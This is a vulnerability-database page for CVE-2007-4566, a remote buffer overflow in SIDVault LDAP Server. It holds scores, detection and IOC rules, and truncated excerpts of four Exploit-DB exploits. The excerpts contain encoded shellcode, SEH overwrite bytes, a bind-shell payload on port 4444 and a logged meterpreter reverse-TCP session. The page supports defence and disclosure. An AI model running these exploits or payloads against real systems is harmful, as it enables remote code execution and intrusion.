CVE-2007-4566
published 2007-08-28CVE-2007-4566: Multiple buffer overflows in the login mechanism in sidvault in Alpha Centauri Software SIDVault LDAP Server before 2.0f allow remote attackers to execute…
PriorityP356critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
15.33%
96.4th percentile
Multiple buffer overflows in the login mechanism in sidvault in Alpha Centauri Software SIDVault LDAP Server before 2.0f allow remote attackers to execute arbitrary code via crafted LDAP packets, as demonstrated by a long dc entry in an LDAP bind.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alpha_centauri_software | sidvault_ldap_server | <= 2.0e | — |
Detection & IOCsextracted from sources · hover to see the quote
otherSEH overwrite gadget \xE8\x15\xF3\xFF\xFF then nops(5) then \xEB\xF4\x90\x90 then \x29\x10\x40↗
bytes↗
30 82 10 2f 02 01 01 63 82 10 28 04 82 10 06 64 63 3d
bytes↗
30 82 12 10 02 01 01 60 82 12 09 02 01 03 04 82 10 fe 64 63 3d
- →Detect oversized LDAP bind requests with a 'dc=' attribute value exceeding normal length (>1024 bytes) on TCP port 389, indicative of buffer overflow exploitation against SIDVault. ↗
- →Look for LDAP BindRequest packets with a BER-encoded message length field of 0x1210 or 0x102f (unusually large) in the packet header, matching the crafted exploit packet structure. ↗
- →Detect LDAP simple bind requests where the DN field starts with 'dc=' followed by a payload of 1024+ bytes of repeated 0x41 ('A') characters, a classic junk buffer pattern used in all three exploit variants. ↗
- →Alert on LDAP bind requests where the password field is filled with 256 bytes of 0x42 ('B'), a consistent pattern across multiple exploit PoCs for this CVE. ↗
- →Monitor for outbound connections from the SIDVault process (sidvault.exe) to unexpected hosts, or new listening sockets on port 4444, which indicates successful shell_bind_tcp payload execution. ↗
- →Detect the SEH overwrite byte sequence 0xE8 0x18/0x15 0xF3 0xFF 0xFF followed shortly by 0xEB 0xF4 0x90 0x90 within an LDAP packet payload, indicating SEH-based exploitation. ↗
- →Flag use of the Metasploit module exploit/windows/ldap/sidvault_ldap in network or endpoint telemetry, including reverse TCP connections from the target on port 4444 back to the attacker. ↗
- ·The Linux exploit uses a hardcoded JMP ESP address from linux-gate.so (0xffffe777), which is VDSO-mapped and may vary across kernel versions; the Windows exploits use addresses specific to XP SP3 (Shell32.dll 0x7C96BF33) and sidvault.exe (0x401029). ↗
- ·The Windows SEH exploit targets SIDVault 2.0e specifically on Windows XP SP3; the universal ret address (0x401029 p/p/r from sidvault.exe) may not apply to other versions or OS configurations. ↗
- ·The Metasploit module enforces AlphanumUpper encoding and a stack adjustment of -3500 bytes; payloads not matching this encoding profile may fail, meaning detection rules relying on raw shellcode bytes may miss variants using different encoders. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)
exploitdb·2009-09-09
CVE-2007-4566 SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)
SIDVault 2.0e - Windows Universal Buffer Overflow (SEH)
---
#!/usr/bin/python
import socket, sys, ldap
print "[*] SidVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)"
print "[*] Original author : blake"
print "[*] Seh Exploit : Skull-Hacker"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
exploitdb·2009-09-04
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)
---
#--attack-log--
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$ ./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree...
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)
#meterpreter >
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metaspl
Exploit-DB
SIDVault 2.0e - Windows Remote Buffer Overflow
exploitdb·2009-09-03
CVE-2007-4566 SIDVault 2.0e - Windows Remote Buffer Overflow
SIDVault 2.0e - Windows Remote Buffer Overflow
---
#!/usr/bin/python
#
# $ ./sidvault.py 192.168.1.131
#
# [*] SIDVault 2.0e Windows Remote Buffer Overflow
# [*] Written by blake
# [*] Tested on Windows XP SP3
# [+] Sending payload
# [+] Check port 4444 for shell
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys, ldap
print "\n[*] SidVault 2.0e Windows Remote Buffer Overflow"
print "[*] Written by blake"
print "[*] Tested on Windows XP SP3"
if len(sys.argv)!=2:
print "[*] Usage: %s " % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
shellcode = (
"\x89\xe1\xd9\xe1\xd9\x71\xf4\x5d\x55\x59\x49\x49
Exploit-DB
SIDVault LDAP Server - Remote Buffer Overflow
exploitdb·2007-08-25
CVE-2007-4566 SIDVault LDAP Server - Remote Buffer Overflow
SIDVault LDAP Server - Remote Buffer Overflow
---
#!/usr/bin/python
"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""
import sys
import socket
sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35"
sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49"
sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36"
sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56"
sc += "\x48\x56\x4a\x55\x42\x45\x41\x5
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065453.htmlhttp://secunia.com/advisories/26613http://securityreason.com/securityalert/3061http://www.securityfocus.com/archive/1/477821/100/0/threadedhttp://www.securityfocus.com/bid/25460http://www.securitytracker.com/id?1018612http://www.vupen.com/english/advisories/2007/2976https://exchange.xforce.ibmcloud.com/vulnerabilities/36272http://lists.grok.org.uk/pipermail/full-disclosure/2007-August/065453.htmlhttp://secunia.com/advisories/26613http://securityreason.com/securityalert/3061http://www.securityfocus.com/archive/1/477821/100/0/threadedhttp://www.securityfocus.com/bid/25460http://www.securitytracker.com/id?1018612http://www.vupen.com/english/advisories/2007/2976https://exchange.xforce.ibmcloud.com/vulnerabilities/36272
2007-08-28
Published